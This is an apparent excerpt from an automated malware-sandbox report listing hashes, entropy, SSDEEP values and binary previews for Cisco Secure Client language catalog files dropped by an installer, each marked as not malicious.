                                                                                                                                                                                                  MD5:E0D3819F0EB0197EF322DC22B375C578
                                                                                                                                                                                                  SHA1:F6E9928FA3CEF1B892703DE3EA394BF5D5A4DE52
                                                                                                                                                                                                  SHA-256:235C288B5B2A29BE8EA14140AA9D223314AD559545A39D4EEC7F5EB09C024DAD
                                                                                                                                                                                                  SHA-512:358574029EF1BCE7A9A20263155338EEA7A00BE9C2DA7215177A2674EB3655AF74BD11248F231F4A5EE2D0C27E0862ECD88B7B2BD6944328B91DD58BA71DE462
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):362333
                                                                                                                                                                                                  Entropy (8bit):5.410491653751883
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:LjH3UKi/6g1JVBKfKh+KLOPdxLFCtnCCt+GawO+:L7hXgpOFxtn+
                                                                                                                                                                                                  MD5:E0D3819F0EB0197EF322DC22B375C578
                                                                                                                                                                                                  SHA1:F6E9928FA3CEF1B892703DE3EA394BF5D5A4DE52
                                                                                                                                                                                                  SHA-256:235C288B5B2A29BE8EA14140AA9D223314AD559545A39D4EEC7F5EB09C024DAD
                                                                                                                                                                                                  SHA-512:358574029EF1BCE7A9A20263155338EEA7A00BE9C2DA7215177A2674EB3655AF74BD11248F231F4A5EE2D0C27E0862ECD88B7B2BD6944328B91DD58BA71DE462
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):348721
                                                                                                                                                                                                  Entropy (8bit):5.110965971564126
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:LjH3UKh3E5VBKfKh+YFxrglCbcTpLSmYYTpkDUcf8864POcncKpFsy0E5zQE+rAJ:L7hp2
                                                                                                                                                                                                  MD5:20C363D5CC6F504F8269CD61B388DCDE
                                                                                                                                                                                                  SHA1:1F8149525D4B96E42A6E3DCB75D1BEB891A0C9E0
                                                                                                                                                                                                  SHA-256:22DA7703EE811B0A7288F7BD771732B62D9284A156ED43A8E575A266134ADE9E
                                                                                                                                                                                                  SHA-512:4B8B2D03E7670E1635054591E929176781A33B6AAF9B02AF80AD19D02257EA827E9D7E5F5E4F698730AD27699FA5F7D90257EE8967C5886D2E94F18BFF621876
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):348721
                                                                                                                                                                                                  Entropy (8bit):5.110965971564126
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:LjH3UKh3E5VBKfKh+YFxrglCbcTpLSmYYTpkDUcf8864POcncKpFsy0E5zQE+rAJ:L7hp2
                                                                                                                                                                                                  MD5:20C363D5CC6F504F8269CD61B388DCDE
                                                                                                                                                                                                  SHA1:1F8149525D4B96E42A6E3DCB75D1BEB891A0C9E0
                                                                                                                                                                                                  SHA-256:22DA7703EE811B0A7288F7BD771732B62D9284A156ED43A8E575A266134ADE9E
                                                                                                                                                                                                  SHA-512:4B8B2D03E7670E1635054591E929176781A33B6AAF9B02AF80AD19D02257EA827E9D7E5F5E4F698730AD27699FA5F7D90257EE8967C5886D2E94F18BFF621876
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):388375
                                                                                                                                                                                                  Entropy (8bit):5.9662824242248815
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:LjH3U1ogMVyKDmDma70moVBKIuDVKuAYjG+chxEb1XVnhpHg7rmYO0pK4Wl1:LjH3UKtpKDKVBKfKh+HYOSWb
                                                                                                                                                                                                  MD5:0C1C5B23F0C946634836320A60E2246B
                                                                                                                                                                                                  SHA1:9C19265229FAD61B2FCB9FA8E2DC2FDD5DFD97E0
                                                                                                                                                                                                  SHA-256:83A4965A098972336EEFD6C9F9D070BA4C546B11494423621155A2E8084B864E
                                                                                                                                                                                                  SHA-512:E08008AFDFEECA4D75ED57AB9DBAA002F1CA30C0F8B32507EABDE3367AA5152ACEF4F60230E01966F3EC38315BBCD77384F874EC69F8327AEB4720182CB10BF0
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):388375
                                                                                                                                                                                                  Entropy (8bit):5.9662824242248815
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:LjH3U1ogMVyKDmDma70moVBKIuDVKuAYjG+chxEb1XVnhpHg7rmYO0pK4Wl1:LjH3UKtpKDKVBKfKh+HYOSWb
                                                                                                                                                                                                  MD5:0C1C5B23F0C946634836320A60E2246B
                                                                                                                                                                                                  SHA1:9C19265229FAD61B2FCB9FA8E2DC2FDD5DFD97E0
                                                                                                                                                                                                  SHA-256:83A4965A098972336EEFD6C9F9D070BA4C546B11494423621155A2E8084B864E
                                                                                                                                                                                                  SHA-512:E08008AFDFEECA4D75ED57AB9DBAA002F1CA30C0F8B32507EABDE3367AA5152ACEF4F60230E01966F3EC38315BBCD77384F874EC69F8327AEB4720182CB10BF0
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):357929
                                                                                                                                                                                                  Entropy (8bit):6.014691052026819
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:LjH3U1ogM5PcD4sAVoVBKIuDVKuAYjG+chxEb1XVnhkv3zdYGLzOJ7CiqP0aCKo:LjH3UKwSOVBKfKh+wfBY6iJ7CLc5Ko
                                                                                                                                                                                                  MD5:B0DAAEF17D63E6DB7225FC65A5BEED25
                                                                                                                                                                                                  SHA1:CD73B824DDC96B0BCB4BA3E4BF389BF8153B2440
                                                                                                                                                                                                  SHA-256:3B0D7490F9015F37EBA158AFE26F9C56A9D35624564CD295EC596D9A6B52B340
                                                                                                                                                                                                  SHA-512:448D36E38E516A33CD5A9AB50B3DEE45B1EED40E05AC9B13B3041CC4523EB8E42EE3A88355FA27A1652D0B8D9C58DECD90FF88EEE2765D42584FD94142ACDA8B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):357929
                                                                                                                                                                                                  Entropy (8bit):6.014691052026819
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:LjH3U1ogM5PcD4sAVoVBKIuDVKuAYjG+chxEb1XVnhkv3zdYGLzOJ7CiqP0aCKo:LjH3UKwSOVBKfKh+wfBY6iJ7CLc5Ko
                                                                                                                                                                                                  MD5:B0DAAEF17D63E6DB7225FC65A5BEED25
                                                                                                                                                                                                  SHA1:CD73B824DDC96B0BCB4BA3E4BF389BF8153B2440
                                                                                                                                                                                                  SHA-256:3B0D7490F9015F37EBA158AFE26F9C56A9D35624564CD295EC596D9A6B52B340
                                                                                                                                                                                                  SHA-512:448D36E38E516A33CD5A9AB50B3DEE45B1EED40E05AC9B13B3041CC4523EB8E42EE3A88355FA27A1652D0B8D9C58DECD90FF88EEE2765D42584FD94142ACDA8B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):347088
                                                                                                                                                                                                  Entropy (8bit):5.137429334753401
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:LjH3U1ogMlckwL1nSoVBKIuDVKuAYjG+chxEb1XVnhMmpLSr1LgO0+1zfykgRhr8:LjH3UKtcpnnVBKfKh+jFP0Z
                                                                                                                                                                                                  MD5:F9ABBCA86A0DAB6C01915CB745CDE31A
                                                                                                                                                                                                  SHA1:49FF0DB4BDCF002AC981AADEAF839FB9F210F28F
                                                                                                                                                                                                  SHA-256:281772D7111DBEE29EE3728CDC56634B4D75AC16E681D66B008EEFECAF6277B3
                                                                                                                                                                                                  SHA-512:76E4FB468C76ADA1B355F7786CF9EE57DCEAB3294E57310B4BA8B9BB84A6EFB4F3BDFB31B4541DBC461164E521496B0287BE0ACC09732E3089B49E491D130FAB
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):347088
                                                                                                                                                                                                  Entropy (8bit):5.137429334753401
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:LjH3U1ogMlckwL1nSoVBKIuDVKuAYjG+chxEb1XVnhMmpLSr1LgO0+1zfykgRhr8:LjH3UKtcpnnVBKfKh+jFP0Z
                                                                                                                                                                                                  MD5:F9ABBCA86A0DAB6C01915CB745CDE31A
                                                                                                                                                                                                  SHA1:49FF0DB4BDCF002AC981AADEAF839FB9F210F28F
                                                                                                                                                                                                  SHA-256:281772D7111DBEE29EE3728CDC56634B4D75AC16E681D66B008EEFECAF6277B3
                                                                                                                                                                                                  SHA-512:76E4FB468C76ADA1B355F7786CF9EE57DCEAB3294E57310B4BA8B9BB84A6EFB4F3BDFB31B4541DBC461164E521496B0287BE0ACC09732E3089B49E491D130FAB
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):352370
                                                                                                                                                                                                  Entropy (8bit):5.387002164805478
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:LjH3UKisfdVbVBKfKh+tps+fpWQUbSKN/dTkL4ecW:L7h/VojUbS
                                                                                                                                                                                                  MD5:40675B2B9871F33C2739B9636A54EE25
                                                                                                                                                                                                  SHA1:9E16B111B97E810EB5E32FF935649DD5057AFD52
                                                                                                                                                                                                  SHA-256:C165FF2D1226D1653E42E133DCD3346B3C239779C4EAFF2FA05D8A8416AABEE1
                                                                                                                                                                                                  SHA-512:1C1908139C3A4072431D74360513369CFBDD4F0E9EB839457A3C15622A2C5983278DA2BB883CD159C358C143C17CDDC37C54A92F691E313DDE4DC891AF1D1F99
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):352370
                                                                                                                                                                                                  Entropy (8bit):5.387002164805478
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:LjH3UKisfdVbVBKfKh+tps+fpWQUbSKN/dTkL4ecW:L7h/VojUbS
                                                                                                                                                                                                  MD5:40675B2B9871F33C2739B9636A54EE25
                                                                                                                                                                                                  SHA1:9E16B111B97E810EB5E32FF935649DD5057AFD52
                                                                                                                                                                                                  SHA-256:C165FF2D1226D1653E42E133DCD3346B3C239779C4EAFF2FA05D8A8416AABEE1
                                                                                                                                                                                                  SHA-512:1C1908139C3A4072431D74360513369CFBDD4F0E9EB839457A3C15622A2C5983278DA2BB883CD159C358C143C17CDDC37C54A92F691E313DDE4DC891AF1D1F99
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):347902
                                                                                                                                                                                                  Entropy (8bit):5.1986177425205575
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:LjH3UKI0MSKZVBKfKh+Ec3LVWxcdXpnY3eURwoqL:L7haJ6
                                                                                                                                                                                                  MD5:B4D5001D372A2A132C4E7D55EAE51207
                                                                                                                                                                                                  SHA1:7EF98532BD39FB2A157A84824EE85BE6856BE3E0
                                                                                                                                                                                                  SHA-256:74D771DF4E83F0D39244FBA32EC6EC10B455398FC2807AD0019ADE29D175935C
                                                                                                                                                                                                  SHA-512:9BAF4D5B332EE1EF8708DE77463D869FB28EB8CD645978E64C8194E40A3C3D681F23313E18654B64EA6C6D1AB075B26628E2B34F2EF608BF1A76CB3427CDFD72
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):347902
                                                                                                                                                                                                  Entropy (8bit):5.1986177425205575
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:LjH3UKI0MSKZVBKfKh+Ec3LVWxcdXpnY3eURwoqL:L7haJ6
                                                                                                                                                                                                  MD5:B4D5001D372A2A132C4E7D55EAE51207
                                                                                                                                                                                                  SHA1:7EF98532BD39FB2A157A84824EE85BE6856BE3E0
                                                                                                                                                                                                  SHA-256:74D771DF4E83F0D39244FBA32EC6EC10B455398FC2807AD0019ADE29D175935C
                                                                                                                                                                                                  SHA-512:9BAF4D5B332EE1EF8708DE77463D869FB28EB8CD645978E64C8194E40A3C3D681F23313E18654B64EA6C6D1AB075B26628E2B34F2EF608BF1A76CB3427CDFD72
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):467531
                                                                                                                                                                                                  Entropy (8bit):5.410391422981112
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:L7hsbx/gNDWv68D6Iv6x5RaGUT0fDmKuajZHd+1wt8:L7a6FmG8
                                                                                                                                                                                                  MD5:2C1A2A453E54BFCEE2E97D458843C3BE
                                                                                                                                                                                                  SHA1:DF8512B13FB56BB6FCCC5BA01C91D42949875B44
                                                                                                                                                                                                  SHA-256:535CD27F4C25F5C007432FFD985C7EA3325659F2D1544264F317E71DD3377E84
                                                                                                                                                                                                  SHA-512:2351333B17AB072A2AC9E24D0772775D3519A3163EEB6BAB735845BBC96A51380A181C4E99AD21BECD99F8ED256E845DC421B773F33DD45E260783E90CA66333
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):467531
                                                                                                                                                                                                  Entropy (8bit):5.410391422981112
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:L7hsbx/gNDWv68D6Iv6x5RaGUT0fDmKuajZHd+1wt8:L7a6FmG8
                                                                                                                                                                                                  MD5:2C1A2A453E54BFCEE2E97D458843C3BE
                                                                                                                                                                                                  SHA1:DF8512B13FB56BB6FCCC5BA01C91D42949875B44
                                                                                                                                                                                                  SHA-256:535CD27F4C25F5C007432FFD985C7EA3325659F2D1544264F317E71DD3377E84
                                                                                                                                                                                                  SHA-512:2351333B17AB072A2AC9E24D0772775D3519A3163EEB6BAB735845BBC96A51380A181C4E99AD21BECD99F8ED256E845DC421B773F33DD45E260783E90CA66333
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):312691
                                                                                                                                                                                                  Entropy (8bit):6.238069670792444
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:LjH3UK5pl6VBKfKh+spMr61W19INBYB4XGt48xITy:L7h3upMrT19INBYB4XGt48x+y
                                                                                                                                                                                                  MD5:05212F97A23F922493CD7F066373D92C
                                                                                                                                                                                                  SHA1:F8C2E7CD2949950A1227F02058B82E81876F5C73
                                                                                                                                                                                                  SHA-256:66997C101367684439899AC5A287CF194AC7E0BA9CBA753BC620D15B8F98193E
